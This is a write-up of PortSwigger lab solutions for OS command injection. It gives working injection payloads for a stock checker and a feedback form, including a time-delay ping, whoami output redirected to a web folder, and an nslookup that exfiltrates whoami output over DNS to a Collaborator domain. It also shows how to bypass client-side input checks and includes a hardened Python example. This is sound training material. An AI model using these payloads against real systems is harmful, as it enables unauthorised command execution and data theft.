PortSwigger Lab: OS Command Injection Exercises

Simple OS command injection

OS command injection, simple case

Lab

simple

Description

This lab contains an OS command injection vulnerability in the product stock checker.

The application executes a shell command containing user-supplied product and store IDs, and returns the raw output from the command in its response.

To solve the lab, execute the whoami command to determine the name of the current user.

Solution

Open a product page and check its stock. The POST request sends the following parameter:

storeId: 1

Open the developer tools (F12) and edit the stock-check dropdown: the select element contains three option elements. Change the value of any one option from 1 to 1&whoami.

Select the modified option and submit the stock-check request. The response shows that the system user is peter-OIFshm, which solves the lab.
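As an added example (not part of this write-up or of the lab's own code), the pattern that makes the stock checker exploitable is shown beside a hardened form: the script path and the rule that IDs are plain integers are assumptions.

```python
import re
import subprocess
from typing import List

# Hypothetical path of the stock-checking script (assumption, not from the lab).
STOCK_SCRIPT = "/usr/bin/stockreport.pl"

# Allow-list: product and store identifiers are plain non-negative integers.
ID_PATTERN = re.compile(r"^[0-9]{1,10}$")


def vulnerable_command(product_id: str, store_id: str) -> str:
    """The pattern the lab exploits: user input is interpolated into a shell
    string, so a value such as "1&whoami" is parsed as a second command."""
    return f"{STOCK_SCRIPT} {product_id} {store_id}"


def validate_id(value: str) -> str:
    """Reject anything that is not a plain integer before it reaches a command."""
    if not ID_PATTERN.fullmatch(value):
        raise ValueError(f"invalid identifier: {value!r}")
    return value


def safe_stock_check_argv(product_id: str, store_id: str) -> List[str]:
    """Hardened form: validated arguments are passed as an argv list, so no shell
    ever parses them and metacharacters such as & have no special meaning."""
    return [STOCK_SCRIPT, validate_id(product_id), validate_id(store_id)]


def run_stock_check(product_id: str, store_id: str) -> str:
    """Execute with shell=False; the argv list goes directly to the program."""
    result = subprocess.run(
        safe_stock_check_argv(product_id, store_id),
        shell=False, capture_output=True, text=True, timeout=5, check=False,
    )
    return result.stdout


def is_injection_attempt(product_id: str, store_id: str) -> bool:
    """Detection helper for logging or alerting: True when validation would
    reject the request (e.g. the "1&whoami" value used in the lab)."""
    try:
        validate_id(product_id)
        validate_id(store_id)
    except ValueError:
        return True
    return False
```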

Blind OS command injection using time delays

Blind OS command injection with time delays

Lab

blind-time-delays

Description

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response.

To solve the lab, exploit the blind OS command injection vulnerability to cause a 10 second delay.

Solution

Submit the following in the email field of the feedback form. In the developer tools (F12), change the input's type attribute from email to text to bypass the client-side check:

&ping -c 10 localhost&

Blind OS command injection using output redirection

Blind OS command injection with output redirection

Lab

blind-output-redirection

Description

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The output from the command is not returned in the response. However, you can use output redirection to capture the output from the command. There is a writable folder at:

/var/www/images/

To solve the lab, execute the whoami command and retrieve the output.

Solution

Redirect the output of the whoami command to a file in the accessible directory.

Submit the following in the email field of the feedback form. In the developer tools (F12), change the input's type attribute from email to text to bypass the client-side check:

& whoami > /var/www/images/whoami.txt &

Then read that file: request any product image and replace the filename with the name of the file the output was redirected to, which reveals the username.

/image?filename=whoami.txt

Blind OS command injection using out-of-band interaction

Blind OS command injection with out-of-band interaction

Lab

blind-out-of-band

Description

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application's response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, exploit the blind OS command injection vulnerability to issue a DNS lookup to Burp Collaborator.

Note

To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator's default public server.

Solution

Submit the following in the email field of the feedback form. In the developer tools (F12), change the input's type attribute from email to text to bypass the client-side check.

Replace BURP-COLLABORATOR-SUBDOMAIN with the subdomain obtained from the Burp Collaborator server:

& nslookup `whoami`.BURP-COLLABORATOR-SUBDOMAIN.burpcollaborator.net &

Blind OS command injection using out-of-band data exfiltration

Blind OS command injection with out-of-band data exfiltration

Lab

blind-out-of-band-data-exfiltration

Description

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application's response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, execute the whoami command and exfiltrate the output via a DNS query to Burp Collaborator. You will need to enter the name of the current user to complete the lab.

Note

To prevent the Academy platform being used to attack third parties, our firewall blocks interactions between the labs and arbitrary external systems. To solve the lab, you must use Burp Collaborator's default public server.

Solution

Same approach as the previous lab.

Submit the following in the email field of the feedback form. In the developer tools (F12), change the input's type attribute from email to text to bypass the client-side check.

Replace BURP-COLLABORATOR-SUBDOMAIN with the subdomain obtained from the Burp Collaborator server:

& nslookup `whoami`.BURP-COLLABORATOR-SUBDOMAIN.burpcollaborator.net &

Read the username from the Collaborator DNS query and submit it to solve the lab.

Posted by SD_ZYL